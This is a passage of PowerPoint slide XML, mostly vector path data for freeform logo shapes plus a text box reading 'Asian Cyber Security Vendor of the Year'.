                    <a:gd name="T33" fmla="*/ 71 h 127"/>
                    <a:gd name="T34" fmla="*/ 79 w 110"/>
                    <a:gd name="T35" fmla="*/ 71 h 127"/>
                    <a:gd name="T36" fmla="*/ 79 w 110"/>
                    <a:gd name="T37" fmla="*/ 76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0" h="127">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="0"/>
                        <a:pt x="21" y="5"/>
                        <a:pt x="4" y="19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cubicBezTo>
                        <a:pt x="31" y="30"/>
                        <a:pt x="42" y="25"/>
                        <a:pt x="54" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="25"/>
                        <a:pt x="79" y="33"/>
                        <a:pt x="79" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="47"/>
                        <a:pt x="79" y="47"/>
                        <a:pt x="79" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="47"/>
                        <a:pt x="73" y="47"/>
                        <a:pt x="73" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="0" y="50"/>
                        <a:pt x="1" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="116"/>
                        <a:pt x="22" y="127"/>
                        <a:pt x="44" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="127"/>
                        <a:pt x="72" y="123"/>
                        <a:pt x="81" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="124"/>
                        <a:pt x="82" y="124"/>
                        <a:pt x="82" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="124"/>
                        <a:pt x="110" y="124"/>
                        <a:pt x="110" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="45"/>
                        <a:pt x="110" y="45"/>
                        <a:pt x="110" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="17"/>
                        <a:pt x="94" y="0"/>
                        <a:pt x="57" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="79" y="76"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="104"/>
                        <a:pt x="33" y="111"/>
                        <a:pt x="33" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="72"/>
                        <a:pt x="59" y="71"/>
                        <a:pt x="75" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="71"/>
                        <a:pt x="79" y="71"/>
                        <a:pt x="79" y="71"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="79" y="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</p:grp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4C76D990-93BA-6247-AD06-506319ED1F41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4133027" y="5694235"/>
              <a:ext cx="629330" cy="685930"/>
              <a:chOff x="1167666" y="5694235"/>
              <a:chExt cx="629330" cy="685930"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="213" name="Shape 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52350990-FD8B-0D4C-8A2C-95C23601D626}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1167666" y="6103166"/>
                <a:ext cx="62933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Asian</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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Cyber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Security</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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Vendor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of </a:t>
                </a:r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the</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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Year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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="214" name="그룹 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2FFDA2B-00CC-0F43-A35F-C95375653E5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1260786" y="5694235"/>
                <a:ext cx="443091" cy="250443"/>
                <a:chOff x="19923062" y="23553761"/>
                <a:chExt cx="2811463" cy="158908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15" name="Freeform 70">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D9D35F-8897-404F-9D97-0D985BC955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078887" y="24625324"/>
                  <a:ext cx="53975" cy="80963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 34"/>
                    <a:gd name="T1" fmla="*/ 0 h 51"/>
                    <a:gd name="T2" fmla="*/ 0 w 34"/>
                    <a:gd name="T3" fmla="*/ 51 h 51"/>
                    <a:gd name="T4" fmla="*/ 34 w 34"/>
                    <a:gd name="T5" fmla="*/ 51 h 51"/>
                    <a:gd name="T6" fmla="*/ 16 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 51"/>
                    <a:gd name="T8" fmla="*/ 16 w 34"/>
                    <a:gd name="T9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51">
                      <a:moveTo>
                        <a:pt x="16" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="51"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="51"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0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16" name="Freeform 71">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D08EA9C2-CF3B-8D42-BF24-9A952AC217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18424" y="23922061"/>
                  <a:ext cx="58738" cy="80963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 19"/>
                    <a:gd name="T2" fmla="*/ 0 w 14"/>
                    <a:gd name="T3" fmla="*/ 1 h 19"/>
                    <a:gd name="T4" fmla="*/ 0 w 14"/>
                    <a:gd name="T5" fmla="*/ 19 h 19"/>
                    <a:gd name="T6" fmla="*/ 3 w 14"/>
                    <a:gd name="T7" fmla="*/ 19 h 19"/>
                    <a:gd name="T8" fmla="*/ 14 w 14"/>
                    <a:gd name="T9" fmla="*/ 10 h 19"/>
                    <a:gd name="T10" fmla="*/ 4 w 14"/>
                    <a:gd name="T11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19">
                      <a:moveTo>
                        <a:pt x="4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" y="19"/>
                        <a:pt x="2" y="19"/>
                        <a:pt x="3" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="19"/>
                        <a:pt x="14" y="14"/>
                        <a:pt x="14" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="11" y="0"/>
                        <a:pt x="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17" name="Freeform 72">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C60688-E40A-2944-970B-DB47809C08A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9923062" y="23553761"/>
                  <a:ext cx="2811463" cy="1589088"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 664"/>
                    <a:gd name="T1" fmla="*/ 0 h 375"/>
                    <a:gd name="T2" fmla="*/ 334 w 664"/>
                    <a:gd name="T3" fmla="*/ 84 h 375"/>
                    <a:gd name="T4" fmla="*/ 41 w 664"/>
                    <a:gd name="T5" fmla="*/ 289 h 375"/>
                    <a:gd name="T6" fmla="*/ 54 w 664"/>
                    <a:gd name="T7" fmla="*/ 255 h 375"/>
                    <a:gd name="T8" fmla="*/ 41 w 664"/>
                    <a:gd name="T9" fmla="*/ 291 h 375"/>
                    <a:gd name="T10" fmla="*/ 107 w 664"/>
                    <a:gd name="T11" fmla="*/ 276 h 375"/>
                    <a:gd name="T12" fmla="*/ 119 w 664"/>
                    <a:gd name="T13" fmla="*/ 247 h 375"/>
                    <a:gd name="T14" fmla="*/ 138 w 664"/>
                    <a:gd name="T15" fmla="*/ 277 h 375"/>
                    <a:gd name="T16" fmla="*/ 146 w 664"/>
                    <a:gd name="T17" fmla="*/ 247 h 375"/>
                    <a:gd name="T18" fmla="*/ 156 w 664"/>
                    <a:gd name="T19" fmla="*/ 105 h 375"/>
                    <a:gd name="T20" fmla="*/ 172 w 664"/>
                    <a:gd name="T21" fmla="*/ 113 h 375"/>
                    <a:gd name="T22" fmla="*/ 162 w 664"/>
                    <a:gd name="T23" fmla="*/ 127 h 375"/>
                    <a:gd name="T24" fmla="*/ 149 w 664"/>
                    <a:gd name="T25" fmla="*/ 120 h 375"/>
                    <a:gd name="T26" fmla="*/ 175 w 664"/>
                    <a:gd name="T27" fmla="*/ 85 h 375"/>
                    <a:gd name="T28" fmla="*/ 190 w 664"/>
                    <a:gd name="T29" fmla="*/ 291 h 375"/>
                    <a:gd name="T30" fmla="*/ 190 w 664"/>
                    <a:gd name="T31" fmla="*/ 247 h 375"/>
                    <a:gd name="T32" fmla="*/ 203 w 664"/>
                    <a:gd name="T33" fmla="*/ 282 h 375"/>
                    <a:gd name="T34" fmla="*/ 266 w 664"/>
                    <a:gd name="T35" fmla="*/ 129 h 375"/>
                    <a:gd name="T36" fmla="*/ 235 w 664"/>
                    <a:gd name="T37" fmla="*/ 123 h 375"/>
                    <a:gd name="T38" fmla="*/ 222 w 664"/>
                    <a:gd name="T39" fmla="*/ 127 h 375"/>
                    <a:gd name="T40" fmla="*/ 232 w 664"/>
                    <a:gd name="T41" fmla="*/ 86 h 375"/>
                    <a:gd name="T42" fmla="*/ 266 w 664"/>
                    <a:gd name="T43" fmla="*/ 127 h 375"/>
                    <a:gd name="T44" fmla="*/ 271 w 664"/>
                    <a:gd name="T45" fmla="*/ 289 h 375"/>
                    <a:gd name="T46" fmla="*/ 280 w 664"/>
                    <a:gd name="T47" fmla="*/ 247 h 375"/>
                    <a:gd name="T48" fmla="*/ 294 w 664"/>
                    <a:gd name="T49" fmla="*/ 289 h 375"/>
                    <a:gd name="T50" fmla="*/ 345 w 664"/>
                    <a:gd name="T51" fmla="*/ 204 h 375"/>
                    <a:gd name="T52" fmla="*/ 334 w 664"/>
                    <a:gd name="T53" fmla="*/ 162 h 375"/>
                    <a:gd name="T54" fmla="*/ 314 w 664"/>
                    <a:gd name="T55" fmla="*/ 187 h 375"/>
                    <a:gd name="T56" fmla="*/ 319 w 664"/>
                    <a:gd name="T57" fmla="*/ 214 h 375"/>
                    <a:gd name="T58" fmla="*/ 339 w 664"/>
                    <a:gd name="T59" fmla="*/ 193 h 375"/>
                    <a:gd name="T60" fmla="*/ 365 w 664"/>
                    <a:gd name="T61" fmla="*/ 183 h 375"/>
                    <a:gd name="T62" fmla="*/ 349 w 664"/>
                    <a:gd name="T63" fmla="*/ 186 h 375"/>
                    <a:gd name="T64" fmla="*/ 370 w 664"/>
                    <a:gd name="T65" fmla="*/ 291 h 375"/>
                    <a:gd name="T66" fmla="*/ 357 w 664"/>
                    <a:gd name="T67" fmla="*/ 253 h 375"/>
                    <a:gd name="T68" fmla="*/ 370 w 664"/>
                    <a:gd name="T69" fmla="*/ 249 h 375"/>
                    <a:gd name="T70" fmla="*/ 408 w 664"/>
                    <a:gd name="T71" fmla="*/ 97 h 375"/>
                    <a:gd name="T72" fmla="*/ 421 w 664"/>
                    <a:gd name="T73" fmla="*/ 86 h 375"/>
                    <a:gd name="T74" fmla="*/ 407 w 664"/>
                    <a:gd name="T75" fmla="*/ 119 h 375"/>
                    <a:gd name="T76" fmla="*/ 436 w 664"/>
                    <a:gd name="T77" fmla="*/ 291 h 375"/>
                    <a:gd name="T78" fmla="*/ 422 w 664"/>
                    <a:gd name="T79" fmla="*/ 247 h 375"/>
                    <a:gd name="T80" fmla="*/ 430 w 664"/>
                    <a:gd name="T81" fmla="*/ 262 h 375"/>
                    <a:gd name="T82" fmla="*/ 445 w 664"/>
                    <a:gd name="T83" fmla="*/ 249 h 375"/>
                    <a:gd name="T84" fmla="*/ 489 w 664"/>
                    <a:gd name="T85" fmla="*/ 88 h 375"/>
                    <a:gd name="T86" fmla="*/ 486 w 664"/>
                    <a:gd name="T87" fmla="*/ 85 h 375"/>
                    <a:gd name="T88" fmla="*/ 519 w 664"/>
                    <a:gd name="T89" fmla="*/ 94 h 375"/>
                    <a:gd name="T90" fmla="*/ 510 w 664"/>
                    <a:gd name="T91" fmla="*/ 129 h 375"/>
                    <a:gd name="T92" fmla="*/ 498 w 664"/>
                    <a:gd name="T93" fmla="*/ 88 h 375"/>
                    <a:gd name="T94" fmla="*/ 523 w 664"/>
                    <a:gd name="T95" fmla="*/ 289 h 375"/>
                    <a:gd name="T96" fmla="*/ 508 w 664"/>
                    <a:gd name="T97" fmla="*/ 274 h 375"/>
                    <a:gd name="T98" fmla="*/ 511 w 664"/>
                    <a:gd name="T99" fmla="*/ 291 h 375"/>
                    <a:gd name="T100" fmla="*/ 504 w 664"/>
                    <a:gd name="T101" fmla="*/ 278 h 375"/>
                    <a:gd name="T102" fmla="*/ 518 w 664"/>
                    <a:gd name="T103" fmla="*/ 245 h 375"/>
                    <a:gd name="T104" fmla="*/ 635 w 664"/>
                    <a:gd name="T105" fmla="*/ 249 h 375"/>
                    <a:gd name="T106" fmla="*/ 593 w 664"/>
                    <a:gd name="T107" fmla="*/ 279 h 375"/>
                    <a:gd name="T108" fmla="*/ 584 w 664"/>
                    <a:gd name="T109" fmla="*/ 289 h 375"/>
                    <a:gd name="T110" fmla="*/ 589 w 664"/>
                    <a:gd name="T111" fmla="*/ 247 h 375"/>
                    <a:gd name="T112" fmla="*/ 619 w 664"/>
                    <a:gd name="T113" fmla="*/ 249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375">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="375"/>
                        <a:pt x="0" y="375"/>
                        <a:pt x="0" y="375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="664" y="375"/>
                        <a:pt x="664" y="375"/>
                        <a:pt x="664" y="375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="664" y="0"/>
                        <a:pt x="664" y="0"/>
                        <a:pt x="664" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="334" y="84"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="347" y="84"/>
                        <a:pt x="357" y="95"/>
                        <a:pt x="357" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="357" y="118"/>
                        <a:pt x="348" y="130"/>
                        <a:pt x="334" y="130"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="321" y="130"/>
                        <a:pt x="311" y="119"/>
                        <a:pt x="311" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="311" y="96"/>
                        <a:pt x="320" y="84"/>
                        <a:pt x="334" y="84"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="41" y="291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="291"/>
                        <a:pt x="34" y="291"/>
                        <a:pt x="31" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="280"/>
                        <a:pt x="29" y="280"/>
                        <a:pt x="29" y="280"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="280"/>
                        <a:pt x="31" y="280"/>
                        <a:pt x="31" y="280"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="285"/>
                        <a:pt x="36" y="289"/>
                        <a:pt x="41" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="289"/>
                        <a:pt x="50" y="286"/>
                        <a:pt x="50" y="281"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="270"/>
                        <a:pt x="31" y="273"/>
                        <a:pt x="31" y="258"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="250"/>
                        <a:pt x="37" y="246"/>
                        <a:pt x="45" y="246"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="246"/>
                        <a:pt x="50" y="247"/>
                        <a:pt x="53" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="255"/>
                        <a:pt x="54" y="255"/>
                        <a:pt x="54" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="255"/>
                        <a:pt x="52" y="255"/>
                        <a:pt x="52" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="251"/>
                        <a:pt x="48" y="248"/>
                        <a:pt x="44" y="248"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="248"/>
                        <a:pt x="36" y="252"/>
                        <a:pt x="36" y="256"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="268"/>
                        <a:pt x="56" y="265"/>
                        <a:pt x="56" y="279"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="287"/>
                        <a:pt x="48" y="291"/>
                        <a:pt x="41" y="291"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="146" y="249"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="249"/>
                        <a:pt x="141" y="251"/>
                        <a:pt x="141" y="259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="277"/>
                        <a:pt x="141" y="277"/>
                        <a:pt x="141" y="277"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="285"/>
                        <a:pt x="136" y="291"/>
                        <a:pt x="124" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="291"/>
                        <a:pt x="107" y="286"/>
                        <a:pt x="107" y="276"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="253"/>
                        <a:pt x="107" y="253"/>
                        <a:pt x="107" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="249"/>
                        <a:pt x="104" y="249"/>
                        <a:pt x="101" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="247"/>
                        <a:pt x="101" y="247"/>
                        <a:pt x="101" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="247"/>
                        <a:pt x="107" y="247"/>
                        <a:pt x="110" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="247"/>
                        <a:pt x="116" y="247"/>
                        <a:pt x="119" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="249"/>
                        <a:pt x="119" y="249"/>
                        <a:pt x="119" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="116" y="249"/>
                        <a:pt x="113" y="249"/>
                        <a:pt x="113" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="274"/>
                        <a:pt x="113" y="274"/>
                        <a:pt x="113" y="274"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="282"/>
                        <a:pt x="116" y="289"/>
                        <a:pt x="126" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="289"/>
                        <a:pt x="138" y="281"/>
                        <a:pt x="138" y="277"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="259"/>
                        <a:pt x="138" y="259"/>
                        <a:pt x="138" y="259"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="249"/>
                        <a:pt x="137" y="249"/>
                        <a:pt x="132" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132" y="247"/>
                        <a:pt x="132" y="247"/>
                        <a:pt x="132" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="134" y="247"/>
                        <a:pt x="137" y="247"/>
                        <a:pt x="140" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="247"/>
                        <a:pt x="144" y="247"/>
                        <a:pt x="146" y="247"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="146" y="249"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="174" y="94"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="173" y="89"/>
                        <a:pt x="171" y="87"/>
                        <a:pt x="163" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="87"/>
                        <a:pt x="156" y="87"/>
                        <a:pt x="156" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="105"/>
                        <a:pt x="156" y="105"/>
                        <a:pt x="156" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="163" y="105"/>
                        <a:pt x="163" y="105"/>
                        <a:pt x="163" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="169" y="105"/>
                        <a:pt x="169" y="104"/>
                        <a:pt x="170" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="100"/>
                        <a:pt x="172" y="100"/>
                        <a:pt x="172" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="171" y="101"/>
                        <a:pt x="171" y="104"/>
                        <a:pt x="171" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="171" y="109"/>
                        <a:pt x="171" y="112"/>
                        <a:pt x="172" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="113"/>
                        <a:pt x="170" y="113"/>
                        <a:pt x="170" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="109"/>
                        <a:pt x="169" y="108"/>
                        <a:pt x="164" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="108"/>
                        <a:pt x="156" y="108"/>
                        <a:pt x="156" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="123"/>
                        <a:pt x="156" y="123"/>
                        <a:pt x="156" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="127"/>
                        <a:pt x="158" y="127"/>
                        <a:pt x="162" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="162" y="129"/>
                        <a:pt x="162" y="129"/>
                        <a:pt x="162" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="158" y="129"/>
                        <a:pt x="155" y="129"/>
                        <a:pt x="152" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="129"/>
                        <a:pt x="146" y="129"/>
                        <a:pt x="143" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143" y="127"/>
                        <a:pt x="143" y="127"/>
                        <a:pt x="143" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="127"/>
                        <a:pt x="149" y="126"/>
                        <a:pt x="149" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="93"/>
                        <a:pt x="149" y="93"/>
                        <a:pt x="149" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="87"/>
                        <a:pt x="148" y="87"/>
                        <a:pt x="143" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143" y="85"/>
                        <a:pt x="143" y="85"/>
                        <a:pt x="143" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="85"/>
                        <a:pt x="152" y="86"/>
                        <a:pt x="157" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="163" y="86"/>
                        <a:pt x="169" y="86"/>
                        <a:pt x="175" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="175" y="94"/>
                        <a:pt x="175" y="94"/>
                        <a:pt x="175" y="94"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="174" y="94"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="224" y="291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="219" y="290"/>
                        <a:pt x="213" y="290"/>
                        <a:pt x="208" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="290"/>
                        <a:pt x="196" y="290"/>
                        <a:pt x="190" y="291"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="190" y="289"/>
                        <a:pt x="190" y="289"/>
                        <a:pt x="190" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194" y="289"/>
                        <a:pt x="196" y="288"/>
                        <a:pt x="196" y="285"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="253"/>
                        <a:pt x="196" y="253"/>
                        <a:pt x="196" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="249"/>
                        <a:pt x="194" y="249"/>
                        <a:pt x="190" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="190" y="247"/>
                        <a:pt x="190" y="247"/>
                        <a:pt x="190" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="247"/>
                        <a:pt x="196" y="247"/>
                        <a:pt x="199" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="247"/>
                        <a:pt x="205" y="247"/>
                        <a:pt x="209" y="247"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="209" y="249"/>
                        <a:pt x="209" y="249"/>
                        <a:pt x="209" y="249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="249"/>
                        <a:pt x="203" y="249"/>
                        <a:pt x="203" y="253"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="282"/>
                        <a:pt x="203" y="282"/>
                        <a:pt x="203" y="282"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="287"/>
                        <a:pt x="204" y="289"/>
                        <a:pt x="213" y="289"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="221" y="289"/>
                        <a:pt x="223" y="287"/>
                        <a:pt x="225" y="281"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="227" y="281"/>
                        <a:pt x="227" y="281"/>
                        <a:pt x="227" y="281"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="224" y="291"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="266" y="129"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="264" y="129"/>
                        <a:pt x="263" y="129"/>
                        <a:pt x="261" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="129"/>
                        <a:pt x="257" y="129"/>
                        <a:pt x="256" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="250" y="123"/>
                        <a:pt x="245" y="115"/>
                        <a:pt x="241" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="108"/>
                        <a:pt x="235" y="108"/>
                        <a:pt x="235" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="123"/>
                        <a:pt x="235" y="123"/>
                        <a:pt x="235" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="127"/>
                        <a:pt x="237" y="127"/>
                        <a:pt x="241" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="129"/>
